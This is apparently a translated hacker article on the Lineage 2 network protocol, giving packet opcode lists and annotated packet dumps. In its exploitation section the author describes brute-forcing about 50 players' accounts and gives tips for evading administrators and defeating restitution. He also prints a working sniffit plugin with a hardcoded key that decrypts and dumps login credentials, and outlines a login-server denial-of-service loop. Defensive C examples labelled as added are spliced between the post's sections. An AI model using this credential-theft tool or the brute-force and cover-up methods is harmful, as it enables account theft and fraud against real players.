0xc6 SetAllianceCrest // deprecated
0xc7 ReceiveAllyCrest
0xc8 ServerCloseSocket // deprecated
0xc9 PetStatusShow
0xca PetInfo
0xcb PetItemList
0xcc PetInventoryUpdate
0xcd AllianceInfo // deprecated
0xce PetStatusUpdate
0xcf PetDelete
0xd0 PrivateSellList
0xd1 PrivateBuyList
0xd2 PrivateStoreMsg
0xd3 VehicleStart
0xd4 RequestTimeCheck
0xd5 StartAllianceWar
0xd6 ReplyStartAllianceWar // deprecated
0xd7 StopAllianceWar
0xd8 ReplyStopAllianceWar // deprecated
0xd9 SurrenderAllianceWar // deprecated
0xda SkillCoolTimePacket
0xdb PackageToListPacket
0xdc PackageSendableListPacket
0xdd EarthQuake
0xde FlyToLocation
0xdf BlockList // deprecated
0xe0 SpecialCamera
0xe1 NormalCamera
0xe2 CastleSiegeInfoPacket
0xe3 CastleSiegeAttackerList
0xe4 CastleSiegeDefenderList
0xe5 NickNameChanged
0xe6 PledgeStatusChanged
0xe7 RelationChanged
0xe8 OnEventTrigger
0xe9 MultiSellListPacket
0xea SetSummonRemainTime
0xeb OnSkillRemainSec
0xec NetPingPacket

From the client to the server:

Code:
0x01 MoveBackwardToLocation
0x02 Say
0x03 EnterWorld
0x04 Action
0x08 RequestAuthLogin
0x09 Logout
0x0a Attack
0x0b CharacterCreate
0x0c CharacterDelete
0x0d CharacterSelect
0x0e NewCharacter
0x0f ItemList
0x10 RequestEquipItem
0x11 RequestUnEquipItem
0x12 RequestDropItem
0x12 RequestDropItemFromPet
0x14 UseItem
0x15 TradeRequest
0x16 AddTradeItem
0x17 TradeDone
0x1a RequestTeleport
0x1b SocialAction
0x1c ChangeMoveType // deprecated; 'RequestActionUse' is used now
0x1d ChangeWaitType // deprecated; 'RequestActionUse' is used now
0x1e RequestSellItem
0x1f RequestBuyItem
0x20 RequestLinkHtml
0x21 RequestBypassToServer
0x22 RequestBBSwrite
0x23 RequestCreatePledge
0x24 RequestJoinPledge
0x25 RequestAnswerJoinPledge
0x26 RequestWithDrawalPledge
0x27 RequestOustPledgeMember
0x28 RequestDismissPledge
0x29 RequestJoinParty
0x2a RequestAnswerJoinParty
0x2b RequestWithDrawalParty
0x2c RequestOustPartyMember
0x2d RequestDismissParty
0x2e RequestMagicSkillList
0x2f RequestMagicSkillUse
0x30 Appearing
0x31 SendWareHouseDepositList
0x32 SendWareHouseWithDrawList
0x33 RequestShortCutReg
0x34 RequestShortCutUse
0x35 RequestShortCutDel
0x37 RequestTargetCancel
0x38 Say2 // private message (on some servers, e.g. la2.ru, 0x39 is used)
0x3c RequestPledgeMemberList
0x3e RequestMagicList
0x3f RequestSkillList
0x41 MoveWithDelta
0x42 GetOnVehicle
0x43 GetOffVehicle
0x44 AnswerTradeRequest
0x45 RequestActionUse
0x46 RequestRestart
0x47 RequestSiegeInfo
0x48 ValidatePosition
0x49 RequestSEKCustom
0x4a StartRotating
0x4b FinishRotating
0x4d RequestStartPledgeWar
0x4e RequestReplyStartPledgeWar
0x4f RequestStopPledgeWar
0x50 RequestReplyStopPledgeWar
0x51 RequestSurrenderPledgeWar
0x52 RequestReplySurrenderPledgeWar
0x53 RequestSetPledgeCrest
0x55 RequestGiveNickName // generally used to set CL's title; maybe for something else too…
0x57 RequestShowboard
0x58 RequestEnchantItem
0x59 RequestDestroyItem
0x5b SendBypassBuildCmd
0x5e RequestFriendInvite
0x5f RequestFriendAddReply
0x60 RequestFriendList
0x61 RequestFriendDel
0x62 CharacterRestore
0x63 RequestQuestList
0x64 RequestDestroyQuest
0x66 RequestPledgeInfo
0x67 RequestPledgeExtendedInfo
0x68 RequestPledgeCrest
0x69 RequestSurrenderPersonally
0x6a Ride
0x6b RequestAcquireSkillInfo
0x6c RequestAcquireSkill
0x6d RequestRestartPoint
0x6e RequestGMCommand
0x6f RequestPartyMatchConfig
0x70 RequestPartyMatchList
0x71 RequestPartyMatchDetail
0x72 RequestCrystallizeItem
0x73 RequestPrivateStoreManage
0x74 SetPrivateStoreList
0x75 RequestPrivateStoreManageCancel
0x76 RequestPrivateStoreQuit
0x77 SetPrivateStoreMsg
0x78 RequestPrivateStoreList
0x79 SendPrivateStoreBuyList
0x7a ReviveReply
0x7b RequestTutorialLinkHtml
0x7c RequestTutorialPassCmdToServer
0x7d RequestTutorialQuestionMark
0x7e RequestTutorialClientEvent
0x7f RequestPetition
0x80 RequestPetitionCancel
0x81 RequestGMList
0x82 RequestJoinAlly
0x83 RequestAnswerJoinAlly
0x84 RequestWithdrawAlly
0x85 RequestOustAlly
0x86 RequestDismissAlly
0x87 RequestSetAllyCrest
0x88 RequestAllyCrest
0x89 RequestChangePetName
0x8a RequestPetUseItem
0x8b RequestGiveItemToPet
0x8c RequestGetItemFromPet
0x8e RequestAllyInfo
0x8f RequestPetGetItem
0x90 RequestPrivateStoreBuyManage
0x91 SetPrivateBuyList
0x92 RequestPrivateStoreBuyManageCancel
0x93 RequestPrivateStoreBuyQuit
0x94 SetPrivateBuyMsg
0x95 RequestPrivateStoreBuyList
0x96 SendPrivateStoreBuyBuyList
0x97 SendTimeCheckPacket
0x98 RequestStartAllianceWar
0x99 ReplyStartAllianceWar
0x9a RequestStopAllianceWar
0x9b ReplyStopAllianceWar
0x9c RequestSurrenderAllianceWar
0x9d RequestSkillCoolTime
0x9e RequestPackageSendableItemList
0x9f RequestPackageSend
0xa0 RequestBlock
0xa1 RequestCastleSiegeInfo
0xa2 RequestCastleSiegeAttackerList
0xa3 RequestCastleSiegeInfo
0xa4 RequestJoinCastleSiege
0xa5 RequestConfirmCastleSiegeWaitingList
0xa6 RequestSetCastleSiegeTime
0xa7 RequestMultiSellChoose
0xa8 NetPing

As you can see, most client packets begin with the word Request. Yes, really, the whole game process looks roughly like this: the server constantly sends us the state of the world (positions of mobs/players/NPCs and so on), and whenever we need something (to move, to attack, etc.) we send a "request". Everything is very simple.

4. XID and ObjectID

Every thing (item, NPC) in the game has a 16/32-bit identifier (for trades, 8-bit). The point, you see, is that it is more convenient to send a 2/4-byte number over the network than a phrase of length N like "Crystal Scroll: Enchant Weapon (Grade B)" or an NPC name like "Magister MacTePqpJlOMaCTeP". As you understand, it serves to identify one object or another. The list of these identifiers and the NPCs/items corresponding to them is stored both on the server and on the client, and the two are not synchronized with each other in any way. That is, if this table is replaced on the server, the client has to be patched; this is one of the reasons why every server has its own patch.

Besides this identifier there is also a 32-bit Object ID. After entering the game world, the server assigns a unique OID to each item the character has. And the OID of each subsequent item is the current OID minus 1. That is, the OID is not generated randomly at all, but in order. After assignment, the OID is reserved so that nobody else can receive the same one. This information, by the way, is not confirmed by the source code; it is my own conclusion. If that is not so, then on completing a full cycle (from 0xFFFFFFFF to 0x00000000) it may turn out that an already occupied OID is assigned to a new item, which will lead to unknown consequences (from a possibility of duplication to a simple server crash).
But the problem is that the OID range is quite big :) To be more exact, OIDs must be assigned to ~4.3 billion things to complete a full cycle, which even on a server with a huge online population will take N days (maybe even weeks). Once again I repeat: all of this is an assumption. But the thing is that I, for example, have not seen a single la2 server (even official) with an uptime of more than a week. Maybe the problem is exactly this? On the whole, OIDs are needed for fighting duplication; to be exact, for detecting it. As for NPCs, their OIDs are issued by the same rule, but at the moment the NPC appears in the world. The same goes for character OIDs.

5. Packet examples

a) Buying items

To set up a private buy store, we need to use 3 packets. The first is 0x94 (SetPrivateBuyMsg). As is apparent from the name, it sets the message that is displayed above the character's head during trading (the one on a yellow background). Here is an example:

Code:
// SetPrivateStoreBuyMsg packet
XX XX // size of the data
94 // packet type
41 00 41 00 41 00 42 00 42 00 42 00 // the text; characters are separated by a null byte
00 00 // end of the packet

Next we use a packet of type 0x91 (SetPrivateBuyList). In it we send the number of items, the Item ID and the price. For example:

Code:
// SetPrivateStoreList packet
XX XX // size of the data
91 // packet type
01 00 00 00 // number of things
// beginning of the block
e1 02 00 00 // Item ID
00 00
01 00 00 00 // how many items of the given type to buy up
e8 03 00 00 // the price
// end of the block

Let me explain this packet a little. We have set up buying 1 item with IID 0x2e1 (Scroll of Resurrection) for 1000 adena. And the last packet, of type 0x1d, starts the trade directly:

Code:
XX XX // size of the data
1d // type
01 00 00 00 // quantity

As for selling, practically everything is the same.
Only instead of 'SetPrivateBuyMsg' you use 'SetPrivateStoreMsg', and instead of 'SetPrivateBuyList', 'SetPrivateStoreList' respectively. And, I almost forgot: instead of Item ID, Object ID is used, because we are selling one specific item.

b) Private messages

Here everything is very simple.

Code:
XX XX // size of the data
38 // packet type (Say2)
42 00 42 00 42 00 42 // the message (BBBB)
00 00 00 02 00 00 00 // separator =)
41 00 41 00 41 00 41 // nickname (AAAA)
00 00 00 // the end

c) An example of the packet in which the server sends us the list of all items on the character. This packet is also the one that assigns a unique Object ID to every Item ID.

Code:
XX XX // packet length
1b // packet type (0x1b on antaras.ru)
00 00 05 00 // number of items
04 00 // item type
1e 26 14 40 // Object ID
d4 15 00 00 // Item ID (0x15d4 - Tutorial Guide)
01 00 00 00 // quantity
05 00 00 00 00 00 00 00 00 00 00 00 00 00 // enchant level, quest item, dropped or not, and something else
01 00 // item type
1d 26 14 40 // Object ID
7b 04 00 00 // Item ID (0x47b - Squire's pants)
01 00 00 00 // quantity
01 00 00 00 00 00 00 08 00 00 00 00 00 00
01 00 // item type
1c 26 14 40 // Object ID
7a 04 00 00 // Item ID (0x47a - Squire's Shirt)
01 00 00 00 // quantity
01 00 00 00 00 00 00 04 00 00 00 00 00 00
00 00 // item type
1b 26 14 40 // Object ID
0a 00 00 00 // Item ID (0x0a - dagger)
01 00 00 00 // quantity
00 00 00 00 00 00 80 00 00 00 00 00 00 00
00 00 // item type
1a 26 14 40 // Object ID
42 09 00 00 // Item ID (0x942 - Guild Member's Club)
01 00 00 00 // quantity
00 00 00 00 00 00 80 00 00 00 00 00 00

d) Talking to an NPC, using learning skills as the example

First we need to select the NPC and start a dialogue with it:

Code:
04 // packet type (Action)
51 14 10 48 // OID of the NPC
// next come the character's coordinates
c6 51 01 00 // X
52 45 02 00 // Y
b8 f2 ff ff // Z
00 // the end

Sending this packet once selects the NPC. To start a dialogue with it, the same packet has to be sent one more time. Then, when the window with the choice of dialogues opens and you choose the item "Learn skills", the client sends the server a packet like this:

Code:
21 // packet type (RequestBypassToServer)
6c 00 65 00 61 00 72 00 6e 00 5f 00 73 00 6b 00 69 00 6c 00 6c 00 00 // learn_skill
00 // the end

After the skills dialogue has been called up, you can either view information about any skill by means of:

Code:
6b // packet type (RequestAcquireSkillInfo)
10 00 00 00 // skill number
09 00 00 00 // level

Or, to learn this skill, exactly the same packet is sent, but with type 0x63 (RequestAcquireSkill).

IV. Problems and how they can be used

1. No limit on the number of authorization attempts

This makes unlimited password guessing against any account possible. I will not describe how and what; a bruteforcer is a bruteforcer anywhere. I will only tell about my personal experience in this area. The test was carried out on www.antaras.ru, an old, dying domestic Lineage 2 C1 OFF server (with additions from C3). Using only the information I gave above (plus non-blocking sockets), a bruteforcer (of logins and passwords) was written, together with a program that pulls the list of nicknames playing on the server at the given moment from 'http://antharas.ru/?id=2'. I made a list of passwords of the form 123456789, 0987654321 from random (on antaras.ru the minimum password length is 8 characters; on other servers it differs), and the list of nicknames of gamers playing on the server at the moment came to ~1500 lines. I ran the bruteforce from an outside server so as not to burn my IP. In total, over one night about 50 accounts were opened. But, unfortunately, the greater half of the accounts were either empty or had low-level characters. But the other, smaller part...
I will only say that the total damage done to gamers came to slightly more than 1kkk of game money (equipment), or around $400 if converted into real money, depending on how you bargain. But, to tell the truth, it "did not make" but "would have made": I actually took absolutely nothing from these accounts and found a somewhat different use for all of it ;) About that below.

There are 3 pitfalls in breaking accounts by this method. First, if we log in to the server under a cracked account while its owner is using it at that moment, an inscription appears on his screen that someone is breaking in :/ For this reason I set the bruteforce to run for the night, and in general it is better to do it in the morning. But from my small experience I can say that, whether users do not pay attention to this inscription, do not know English, or are not able to change their password at all, I had no problems with such accounts (on which someone was playing). I mean, nobody among those who found me out changed their password.

Secondly, nickname = login. My program took the nicknames of players who were playing on the server, not their logins at all. But this is not an especially serious problem either in the case of such "mass" breaking, since even if a person with nickname NICKNAME has login LOGINNAME and the password search for nick NICKNAME is in vain, there will necessarily be someone with login NICKNAME, though we will then crack not this particular character.

Thirdly, if you have stripped one character or another, its owner can appeal to the administration, and there is a probability that everything will be returned to him. How to prevent it? I did not run into this, but, thinking logically, I can assume that: they will return everything if the guy proves that he was scammed. In your justification you can say that you bought everything from him for real money (that is not recorded anywhere) and that the guy wanted to cheat you.
For greater persuasiveness, at the moment of "stripping", transfer a round sum from your wallet to some other one and take a screenshot. But the administrators, in turn, can look in the logs and see thousands of login attempts there; accordingly, let the account sit for two weeks after breaking it, so that the logs about the attack sink into oblivion. Administrators can also pay attention to the IP from which the victim usually comes and its mismatch with the one from which it was stripped. Here... you can find someone who uses the same provider, or use its services yourself, or break one of its boxes, or try to explain to the administrators that he simply set you up so cleverly.

Programs that implement the described method of breaking Lineage 2 accounts I have not seen on the Internet... For this reason I decided to write and sell mine: la2brute.5bb.ru. It must be admitted that with the start of its general use, breaking accounts became harder and harder. If I, after writing it (somewhere in February 2006), could break up to 30-50 accounts a night on popular Russian servers, now this figure is 4-5 times smaller. And lastly, I would like to note that the only server that has implemented protection against guessing was la2.abyss.ru. Though actually antaras.ru has also introduced protection: blocking an account for 5 minutes after 40 erroneous login attempts. But with the mass guessing I wrote about above, this protection is practically useless.

2. Packet encryption

As I already said about packet encryption above, the key used for generating the subkeys on the login server is constant. That is understandable: to calculate all the P and S values, the Blowfish encryption algorithm has to be executed 521 times. If new values were generated for each client, it would devour a great many system resources. But the thing is that l2j does exactly that!
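The lockout rule quoted above for antaras.ru (5 minutes after 40 failed attempts) counts failures per account, which is exactly why a run that tries one or two passwords against ~1500 different accounts from one address never trips it. The defender's answer is to count per source as well as per account. The following is an added example written for this page; it is not code from the post, from la2brute or from any server. The per-account numbers are the antaras.ru rule; the per-source threshold (20 failures in 5 minutes), the addresses and the account names in the constructed history are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post: a login-failure policy that counts
 * failures per account AND per source address. The per-account values are
 * the antaras.ru rule the post mentions (40 failures, 5 minutes); the
 * per-source values are assumptions for this example. */
#define ACCOUNT_MAX_FAILS  40
#define ACCOUNT_WINDOW_SEC 300
#define SOURCE_MAX_FAILS   20    /* assumption */
#define SOURCE_WINDOW_SEC  300   /* assumption */

enum login_decision { ALLOW = 0, BLOCK_ACCOUNT = 1, BLOCK_SOURCE = 2 };

struct login_event {
    unsigned when;        /* seconds; a plain counter keeps the example offline */
    const char *source;   /* client address as text */
    const char *account;
    int success;          /* 1 = password accepted, 0 = rejected */
};

/* Failures within `window` seconds before `now`, matched by account (when
 * non-NULL) or by source (when non-NULL). */
static int count_fails(const struct login_event *log, size_t n,
                       const char *account, const char *source,
                       unsigned now, unsigned window)
{
    int fails = 0;
    size_t i;
    for (i = 0; i < n; i++) {
        if (log[i].success || log[i].when > now || now - log[i].when > window)
            continue;
        if ((account && strcmp(log[i].account, account) == 0) ||
            (source && strcmp(log[i].source, source) == 0))
            fails++;
    }
    return fails;
}

/* Decision for a new attempt on `account` from `source` at time `now`. */
int login_policy(const struct login_event *log, size_t n,
                 const char *account, const char *source, unsigned now)
{
    if (count_fails(log, n, account, NULL, now, ACCOUNT_WINDOW_SEC) >= ACCOUNT_MAX_FAILS)
        return BLOCK_ACCOUNT;
    if (count_fails(log, n, NULL, source, now, SOURCE_WINDOW_SEC) >= SOURCE_MAX_FAILS)
        return BLOCK_SOURCE;
    return ALLOW;
}

/* Constructed history (all names and addresses are made up): one source tries
 * one password against 25 different accounts (a spray: no account sees more
 * than one failure), a legitimate player mistypes twice, and one account is
 * hammered 40 times from 8 different sources (5 each). */
#define SPRAY_COUNT 25
#define HAMMER_COUNT 40
#define SAMPLE_LOG_MAX (SPRAY_COUNT + 3 + HAMMER_COUNT)

static char spray_names[SPRAY_COUNT][16];
static char hammer_sources[8][16];
struct login_event sample_log[SAMPLE_LOG_MAX];

size_t build_sample_log(void)
{
    size_t n = 0;
    int i;
    for (i = 0; i < SPRAY_COUNT; i++) {
        snprintf(spray_names[i], sizeof spray_names[i], "player%03d", i);
        sample_log[n++] = (struct login_event){ 10u + 4u * (unsigned)i, "10.0.0.5", spray_names[i], 0 };
    }
    sample_log[n++] = (struct login_event){ 50, "192.0.2.7", "player001", 0 };
    sample_log[n++] = (struct login_event){ 55, "192.0.2.7", "player001", 0 };
    sample_log[n++] = (struct login_event){ 60, "192.0.2.7", "player001", 1 };
    for (i = 0; i < 8; i++)
        snprintf(hammer_sources[i], sizeof hammer_sources[i], "198.51.100.%d", 10 + i);
    for (i = 0; i < HAMMER_COUNT; i++)
        sample_log[n++] = (struct login_event){ 100u + 2u * (unsigned)i, hammer_sources[i % 8], "victim", 0 };
    return n;
}

int main(void)
{
    size_t n = build_sample_log();
    printf("spray source, fresh account:   %d\n", login_policy(sample_log, n, "player030", "10.0.0.5", 200));
    printf("legit player after 2 typos:    %d\n", login_policy(sample_log, n, "player001", "192.0.2.7", 200));
    printf("hammered account, new source:  %d\n", login_policy(sample_log, n, "victim", "203.0.113.9", 200));
    printf("spray source, window expired:  %d\n", login_policy(sample_log, n, "player030", "10.0.0.5", 700));
    return 0;
}
```

With only the per-account rule, the spraying source in the constructed history would be allowed indefinitely, because each of its victims has a single failure; the per-source counter is what catches it, while the per-account counter still catches a distributed attack on one account and a player who merely mistyped twice is left alone.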
Although the key is constant, l2j generates subkeys for each connection! I do not know how the off version does it (I do not have it, and it is very hard to get), but l2j proves that present-day computers are quite up to it. And the problem is that we can sniff someone else's sessions and decrypt them with ease, pulling out the login and password. So what, then, is the sense of encrypting packets with Blowfish? I have written a plug-in for sniffit version 0.3.7.beta that catches and decrypts, on the fly, all packets passing through your computer that contain a login/password to Lineage 2 accounts.

Code:
====> la2_plugin.plug <====
/*
   Sniffit 0.3.7.beta LineAge2 c3 plugin
   Allows to catch and decode la2 RequestAuthLogin packets *on the fly*
   and dump login/passwords.
   by darkgrey / m00.blackhat.ru ~broken
*/

#include "/usr/local/include/blowfish.h"

#define KEY_LEN 20

BF_KEY bfkey;
char key[] = "[;'.]94-31==-&%@!^+]";

void init_la2_plugin()
{
    printf("LineAge2 C3 plugin enabled\n\n");
    BF_set_key(&bfkey, KEY_LEN, key);
}

void PL_la2_plugin(struct Plugin_data *PLD)
{
    int i = 0;
    int count = (PLD->PL_info.DATA_len - 2) / 8;
    char *ptr = PLD->PL_data;
    unsigned char *ls_ip;

    if (PLD->PL_info.DATA_len == 0x32 && PLD->PL_info.UDP_len == 0) {
        ls_ip = (unsigned char *)&(PLD->PL_iphead.destination);
        printf("Login Server ip: %u.%u.%u.%u\n", ls_ip[0], ls_ip[1], ls_ip[2], ls_ip[3]);

        for (i = 0; i < count; i++)
            BF_encrypt((BF_LONG *)((short *)ptr + 1 + i * 4), &bfkey, BF_DECRYPT);

        i = 2;
        printf("Login: ");
        while (PLD->PL_data[i++] != '\x00' || i != 16)
            printf("%c", PLD->PL_data[i]);
        printf("\nPassword: ");
        while (PLD->PL_data[i++] != '\x00' || PLD->PL_data[i] != '\x08')
            printf("%c", PLD->PL_data[i]);
        printf("\n");
    }
}
/* eof */

====> sn_plugins.h <====
#define PLUGIN2_NAME "LineAge2 c3 Plugin"
#define PLUGIN2(x) PL_la2_plugin(x)
#define PLUGIN2_INIT() init_la2_plugin()
#include "la2_plugin.plug"
/* eof */

To use it, you need to copy both files into the directory with sniffit.
Well, for compilation all you need is the same blowfish library and the corresponding entry in the makefile. m00.blackhat.ru/m00-la2sniff.jpg shows the password bruteforcer for Lineage 2 servers at work, with sniffit started in parallel with the plug-in installed, on the example of www.antaras.ru (217.107.212.212 is the IP of the login server).

3. Remote detection of the Lineage 2 server version

Remember I said that the last 8 bytes of login-server packets are reserved for the checksum? More precisely, the penultimate 4 of them :> If you sudd send a packet without a checksum, an off-version Lineage server disconnects us. In l2j the function that checks the checksum returns true or false, but for some reason the returned value is not checked. That is, l2j does not actually verify the checksum. Accordingly, if it disconnects, it is off; if not, l2j.

4. Remote "hang" of a login server

It was noticed that some servers answer packets that contain no login/password with a packet of type 0x03 (which means that you are successfully authorized) and then start to behave extremely unstably. I checked this on 10 large C3 servers: half did not answer such a packet at all, the others answered with packet 0x01 (authorization failed), but only www.la2.ru sent 0x03 and stopped accepting incoming connections for a while (probably they have an "auto-restart" system in place). To implement a program that would hang la2.ru, you need to combine the packet generator given above with a simple TCP client. An endless loop sending such packets will make it impossible to enter the game server.

5. Cloning

The vulnerability that is about to be discussed existed in versions C1 and C2, so I will not concentrate on it especially.
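To show the difference between computing a checksum and acting on it (the l2j behaviour described in item 3 above), here is an added verification routine for the login-server packet; it is not code from the post or from any server. It assumes the checksum is the XOR of the little-endian 32-bit words of the 40-byte payload that follows the length field, which reproduces the value 0x224a0377 printed by the author's program earlier; the sample packet below is that program's non-encrypted dump.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post: verify the login-server packet
 * checksum and actually use the result (item 3 says l2j computed it but
 * ignored it). Layout as in the dump earlier: 2-byte length, 40-byte
 * payload, 4-byte checksum, 4 bytes of padding, 50 (0x32) bytes in all.
 * Assumption: the checksum is the XOR of the payload's little-endian 32-bit
 * words; that reproduces the 0x224a0377 printed by the author's program. */
#define L2_AUTH_PKT_LEN  50
#define L2_AUTH_DATA_OFF  2
#define L2_AUTH_DATA_LEN 40
#define L2_AUTH_CHK_OFF  42

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* XOR of the little-endian 32-bit words in data[0..len). */
uint32_t l2_login_checksum(const unsigned char *data, size_t len)
{
    uint32_t chk = 0;
    size_t i;
    for (i = 0; i + 4 <= len; i += 4)
        chk ^= le32(data + i);
    return chk;
}

/* 1 = length field consistent and checksum correct, 0 = reject. Including
 * the stored checksum word in the XOR makes a valid packet sum to zero. */
int l2_verify_login_packet(const unsigned char *pkt, size_t len)
{
    if (len != L2_AUTH_PKT_LEN)
        return 0;
    if (((size_t)pkt[0] | ((size_t)pkt[1] << 8)) != L2_AUTH_PKT_LEN)
        return 0;
    return l2_login_checksum(pkt + L2_AUTH_DATA_OFF, L2_AUTH_DATA_LEN + 4) == 0;
}

/* The non-encrypted RequestAuthLogin packet from the dump above: login "m00",
 * password "ownzu", checksum 77 03 4a 22 (0x224a0377 little-endian). */
const unsigned char sample_auth_packet[L2_AUTH_PKT_LEN] = {
    0x32,0x00,0x00,0x6d,0x30,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x6f,0x77,0x6e,0x7a,0x75,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x03,0x4a,0x22,0x00,0x00,
    0x00,0x00
};

/* The "packet without checksum" case from item 3: same packet, checksum
 * field zeroed. A server that acts on the result rejects it. */
int l2_verify_with_checksum_cleared(void)
{
    unsigned char pkt[L2_AUTH_PKT_LEN];
    memcpy(pkt, sample_auth_packet, sizeof pkt);
    memset(pkt + L2_AUTH_CHK_OFF, 0, 4);
    return l2_verify_login_packet(pkt, sizeof pkt);
}

int main(void)
{
    printf("checksum of sample payload: 0x%08x\n",
           (unsigned)l2_login_checksum(sample_auth_packet + L2_AUTH_DATA_OFF, L2_AUTH_DATA_LEN));
    printf("sample packet accepted:     %d\n",
           l2_verify_login_packet(sample_auth_packet, L2_AUTH_PKT_LEN));
    printf("checksum cleared accepted:  %d\n", l2_verify_with_checksum_cleared());
    return 0;
}
```

The verification runs on the decrypted packet, after the Blowfish blocks have been decrypted, and it checks the declared length against the received length before touching the payload, so a short packet is rejected before the checksum loop reads past the buffer.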
Its essence is that we, having authorized on the login server once under one account, could enter the game server under the same account an unlimited number of times in parallel. Accordingly, it was possible to enter the game under the same character as many times as necessary. The second cloning possibility was described in the paragraph about IID and OID. Duplication of items through the warehouse, pets and the like I will not consider; this topic does not seem interesting to me, since it has long since stopped working on normal servers.

6. Creating "mutants" and mixing skills

A very interesting topic. The first to implement these ideas in a program (on the Russian net) was Hint. To begin with, as far as you know, several races exist in Lineage. Classes are fixed to each of them (mage and fighter). But the class of one race naturally differs from the similar class of another race (by skills). And the dwarf race has no mage class at all. That was the necessary foreword to understand the sense of everything described below. Now let us consider the character creation request:

Code:
0B // packet type
45 00 6D 00 30 00 30 00 00 00 // character nickname
04 00 00 00 // race
00 00 00 00 // sex
35 00 00 00 // initial profession (class)
14 00 00 00 // 6 constant values; I am at a loss to say what they mean
27 00 00 00 //
2D 00 00 00 //
1B 00 00 00 //
1D 00 00 00 //
0A 00 00 00 //
00 00 00 00 // hair type
00 00 00 00 // hair color
00 00 00 00 // face type

This packet creates a male dwarf fighter with the nickname "m00". It turned out that the server (even the official one) does not check that the race matches the chosen class. This lets us create characters of one race with a class of a completely different one (I call them mutants =)). Sounds interesting, of course, but actually we get an ordinary character with the stats and skills of that class, just with an appearance unusual for it.
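The server-side check the post says is absent (does the requested class belong to the requested race?), as an added example that is not code from the post or from any server. It parses the CharacterCreate (0x0B) packet shown above with bounds checks on the variable-length UTF-16LE nickname, then applies a race/class table. Only "race 4 = dwarf, class 0x35 = dwarf fighter" and "dwarves have no mage class" come from the post; the other race and class ids in the table are assumptions for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post: server-side validation of the
 * CharacterCreate packet. Layout follows the packet shown above: type byte,
 * UTF-16LE nickname terminated by 00 00, then 12 little-endian dwords
 * (race, sex, class, six unknown values, hair type, hair colour, face). */
enum { CC_TYPE = 0x0B, CC_DWORDS = 12, CC_NAME_MAX = 16 };
enum { CC_RACE = 0, CC_SEX = 1, CC_CLASS = 2 };
enum cc_result { CC_OK = 0, CC_MALFORMED = 1, CC_BAD_RACE = 2, CC_CLASS_MISMATCH = 3 };

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = (v >> 24) & 0xFF;
}

/* Parse into fields[CC_DWORDS]; CC_OK or CC_MALFORMED. The nickname scan is
 * bounded by both the packet length and CC_NAME_MAX characters. */
int cc_parse(const unsigned char *pkt, size_t len, uint32_t fields[CC_DWORDS])
{
    size_t i = 1, chars = 0, k;
    if (len < 1 || pkt[0] != CC_TYPE)
        return CC_MALFORMED;
    for (;;) {
        if (i + 2 > len)
            return CC_MALFORMED;            /* terminator never seen */
        if (pkt[i] == 0 && pkt[i + 1] == 0) { i += 2; break; }
        if (++chars > CC_NAME_MAX)
            return CC_MALFORMED;            /* nickname too long */
        i += 2;
    }
    if (len - i != (size_t)CC_DWORDS * 4)
        return CC_MALFORMED;                /* wrong number of trailing dwords */
    for (k = 0; k < CC_DWORDS; k++)
        fields[k] = le32(pkt + i + 4 * k);
    return CC_OK;
}

/* Race -> starting class table. ASSUMED for this example: only race 4 with
 * class 0x35 (dwarf fighter) and "no dwarf mage" are stated in the post. */
static const struct { uint32_t race; uint32_t fighter; int32_t mystic; } race_classes[] = {
    { 0, 0,    10 },   /* human */
    { 1, 18,   25 },   /* elf */
    { 2, 31,   38 },   /* dark elf */
    { 3, 44,   49 },   /* orc */
    { 4, 0x35, -1 },   /* dwarf: fighter only */
};

int cc_validate(const uint32_t fields[CC_DWORDS])
{
    size_t r;
    for (r = 0; r < sizeof race_classes / sizeof race_classes[0]; r++) {
        if (race_classes[r].race != fields[CC_RACE])
            continue;
        if (fields[CC_CLASS] == race_classes[r].fighter ||
            (race_classes[r].mystic >= 0 && fields[CC_CLASS] == (uint32_t)race_classes[r].mystic))
            return CC_OK;
        return CC_CLASS_MISMATCH;
    }
    return CC_BAD_RACE;                     /* nonexistent race id */
}

int cc_check_packet(const unsigned char *pkt, size_t len)
{
    uint32_t fields[CC_DWORDS];
    int rc = cc_parse(pkt, len, fields);
    return rc != CC_OK ? rc : cc_validate(fields);
}

/* The CharacterCreate packet from the post (race 4, class 0x35). */
const unsigned char sample_char_create[] = {
    0x0B, 0x45,0x00,0x6D,0x00,0x30,0x00,0x30,0x00,0x00,0x00,
    0x04,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x35,0x00,0x00,0x00,
    0x14,0x00,0x00,0x00, 0x27,0x00,0x00,0x00, 0x2D,0x00,0x00,0x00,
    0x1B,0x00,0x00,0x00, 0x1D,0x00,0x00,0x00, 0x0A,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00
};

/* Same packet with the race and class dwords (offsets 11 and 19, right after
 * the 10-byte nickname) overwritten: the "mutant" and "no such race" cases. */
int cc_check_modified(uint32_t race, uint32_t class_id)
{
    unsigned char pkt[sizeof sample_char_create];
    memcpy(pkt, sample_char_create, sizeof pkt);
    put_le32(pkt + 11, race);
    put_le32(pkt + 19, class_id);
    return cc_check_packet(pkt, sizeof pkt);
}

int main(void)
{
    printf("dwarf fighter (as in the post): %d\n", cc_check_packet(sample_char_create, sizeof sample_char_create));
    printf("dwarf with human mystic class:  %d\n", cc_check_modified(4, 10));
    printf("nonexistent race:               %d\n", cc_check_modified(7, 0));
    printf("truncated packet:               %d\n", cc_check_packet(sample_char_create, 20));
    return 0;
}
```

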